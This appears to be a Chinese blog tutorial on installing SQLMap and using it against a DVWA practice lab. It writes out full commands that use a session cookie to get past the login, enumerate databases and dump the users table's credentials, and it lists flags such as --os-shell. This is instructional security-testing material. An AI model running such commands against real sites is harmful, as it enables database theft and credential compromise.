安全测试必备工具——SQLMap 安装及基本应用

最新推荐文章于 2024-09-10 10:00:13 发布
最新推荐文章于 2024-09-10 10:00:13 发布
阅读量928 收藏 20
点赞数 12
分类专栏: 软件测试 文章标签: 自动化测试 软件测试 功能测试 程序人生 职场和发展
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NHB234567/article/details/140178085
版权

检测SQL注入漏洞的专用工具是安全人士工具箱的必备品。Sqlmap是由python开发的用来检测与利用SQL注入漏洞的免费开源工具。它可以确定哪些参数、标头或数据元素容易受到SQL注入的影响,以及哪些类型的攻击是可能的。本文详细讲解这款神器的安装及使用。

1、什么是SQLMap?

SQLmap是一款由python开发的用来检测与利用SQL注入漏洞的免费开源工具。支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBMDB2、SQLite等数据库。有一个非常棒的特性,即对检测与利用的自动化处理(如数据库指纹、访问底层文件系统、执行命令)。

2、SQLMap下载

官方网站下载:http://sqlmap.org/

图片

这里选择Github去下载

图片

3、win10下SQLMap安装

1、先安装好python环境,不管是2还是3版本都支持(python安装过程略,自行百度解决)。安装后可cmd命令窗口输入python -V 查看到版本信息即为成功。

在这里插入图片描述

2、将下载好的sqlmap-master.zip压缩包,解压到自己需要的目录

3、进入解压后的目录,在显示目录路径位置输入cmd回车,在弹出的命令行窗口,输入 python sqlmap.py即开启工具使用

图片

4、SQLMap的常用参数

-u∶指定目标URL进行sql注入检测

–batch:自动去做问题应答

–cookie :当前会话的cookie值

–dbs: 查询当前网站所有数据库

-D:指定数据库名

–tables:查询数据库下的所有表名

-T:指定表名

–columns:指定查询所有字段

-C:指定字段的名称

–dump:查询并导出其数据,拖库

–current-db:获取当前数据库

–current-user :获取当前登录数据库用户名称

–users:查询数据库的所有用户

–password:查询数据库用户的密码

–os-shell:直接返回一个shell(如果存在的话)

-flush-session 刷新session文件

如果不想用之前缓存这个目标的session文件,可以使用这个参数。会清空之前的session,重新测试该目标。

5、SQLMap的基本应用

基于DVWA靶场以下模块,进行SQLMap实操演示

图片

1、注入判断 -u

输入:python sqlmap.py -u http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit。去进行操作–会报错,需要登录。

图片

图片

2、添加cookie绕过登录

python sqlmap.py -u “http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low”。

运行过程中需要用户输入y/n才能进入下一步操作,如果希望跳过这些,可以在命令末尾加 --batch

图片

图片

通过以上结果可知,存在SQL注入点。

3、查询当下所有数据库

python sqlmap.py -u “http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low” --dbs --batch

图片

4、查询指定库下的表名

python sqlmap.py -u “http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low” -D dvwa --tables

图片

5、查指定表的所有字段

python sqlmap.py -u “http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low” -D dvwa -T users --columns

图片

6、查询字段内容

python sqlmap.py -u “http://192.168.253.137/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=“PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low” -D dvwa -T users -C user,password --dump

这个过程有点慢,请耐心等待,最终得到表的所有用户及明文密码信息。

图片

最后

此文中提到的工具及技术操作,仅用于学术交流,请遵守《网络安全法》,严禁将此文中工具和技术用于非法攻击测试。

学无止境,行以致远!

最后感谢每一个认真阅读我文章的人,礼尚往来总是要有的,虽然不是什么很值钱的东西,如果你用得到的话可以直接拿走:

这些资料,对于【软件测试】的朋友来说应该是最全面最完整的备战仓库,这个仓库也陪伴上万个测试工程师们走过最艰难的路程,希望也能帮助到你!

程序员笑笑
关注
专栏目录
Web安全扫描工具搭建与使用(附扫描工具安装包)
悦分享
11-06 372
WebInspect也是一款比较常见的Web安全动态扫描工具,它的安全规则库由世界领先的Web安全专家每日维护和更新(与fortify同一个安全团队),有一些创新的评估技术,例如同步扫描和审核及并发应用程序扫描,快速准确地自动执行 Web 应用程序安全测试和 Web 服务安全测试。基于Java的Web代理的方式,用于评估Web应用程序漏洞。Nikto是一款专业的web服务器扫描工具,软件采用命令行的执行方式,可以对服务器进行快速的检测,从而发现潜在的危险以及CGI等问题,是网络管理人员的必备工具
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
热门推荐
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
详解强大的SQL注入工具——SQLMAP
0ffs3t
02-10 3796
详解强大的SQL注入工具——SQLMAP   Akast [N.S.T]      1. 前言  Windows下的注入工具好的又贵,免费的啊D、明小子等又不好用,我们根本没必要花 时间去找什么破解的havij、pangolin什么的,特别是破解的工具很可能被绑了木马。其实 Linux下的注入工具也是非常强大的,不过分的说,可以完全取代Windows下面的所有注入 工具。  就如
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
shanguicsdn111的博客
09-10 5493
提示:SQLmap不能直接「扫描」网站漏洞,先用其他扫描工具扫出注入点,再用SQLmap验证并「利用」注入点。检测「post请求」的注入点,使用BP等工具「抓包」,将http请求内容保存到txt文件中。参数,指定需要检测的url,单/双引号包裹。风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。搜索数据库中是否存在指定库/表/字段,需要指定库名/表名/字段名。就是 all 的意思,获取所有能获取的内容,会消耗很长时间。指定目标「数据库」,单/双引号包裹,常配合其他参数使用。
SQLMAP安装
zrx9988的博客
04-21 511
从头到尾详细安装SQLMAP的步骤
sqlmap安装
Alashan12的博客
03-25 1296
sqlmap的使用需要在python环境下 所以在安装sqlmap前需要先安装python环境 Python下载 https://www.python.org/downloads 下载完成后运行该文件 如图安装成功 Win+R->cmd打开命令行 输入python -V查看环境变量是否安装成功 如上图出现类似此字样表示安装成功 接下来下载sqlmap工具 下载地址: https://sqlmap.org 下载完成后解压并打开文件 ...
sqlmap安装及使用教程
weixin_63033353的博客
07-28 4802
sqlmap 是一个开源渗透测试工具,可自动检测和利用 SQL 注入缺陷并接管数据库服务器,支持多种数据库和多种注入技术。
sqlmapproject-sqlmap-1.7.4-3-g4f76144.zip
01-06
总的来说,这个压缩包包含了一个强大的SQL注入检测工具——SQLMap,以及可能的一个图像隐写分析工具。用户可以使用SQLMap来测试网站的安全性,查找并利用潜在的SQL注入漏洞。而图像隐写分析工具则可以帮助他们在图像...
SQL注入大餐必备餐具SQLMA
11-06
### SQL注入大餐必备餐具——SQLMA #### 一、SQL注入概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL语句来操纵后端数据库,进而获取敏感信息或控制数据库。为了有效地进行SQL...
sqlmap安装
11-06
sqlmap安装包,要配合python的环境使用,。。。。。。。。。。。。。。。。
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8125
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
SQLMap安装
分享与记录
03-06 835
1.sqlmap简介 Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时...
安全测试(一)-Sqlmap安装
qq_39485006的博客
05-29 634
但是我运行的时候执行不了,故在网上查找了另外的方式,直接python sqlmap.py -h 看到这个页面,表示安装成功。就会打开命令符所在的位置,直接右键“发送到”,“桌面快捷方式”,即可再桌面找到对应的快捷方式。找到本机的控制面板,到环境变量的用户变量和系统变量的path添加上对应的python路径。在电脑搜索框,输入cmd,开始菜单会出现命令提示符,右键,点击“打开文件所在的位置”在桌面找到对应的快捷方式,右键“属性”,修改起始位置为对应的sqlmap路径即可。8. 创建sqlmap的快捷方式。
SQLMAP安装及使用教程
qq_45785324的博客
07-08 1万+
sqlmap安装及使用教程
sqlmap安装及使用教程_sqlmap安装使用教程
2401_84253894的博客
04-26 869
sqlmap官方下载地址:sqlmap:自动SQL注入和数据库接管工具下载压缩包,并解压到python2.7的目录下进入sqlmap文件夹,在此文件夹中打开控制台(可以在上方地址栏输入cmd回车快速打开)输入命令或者检验是否成功,出现如图所示界面就代表成功了。每次运行sqlmap时,都要进入到目录中打开cmd,比较麻烦,因此我们可以配置一种快捷的方式去打开。我们可以配置一个批处理文件或者一个快捷方式去打开,这里介绍配置一个快捷方式。在桌面新建一个快捷方式,对象位置输入,点击下一步,给这个快捷方式取一个名称,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值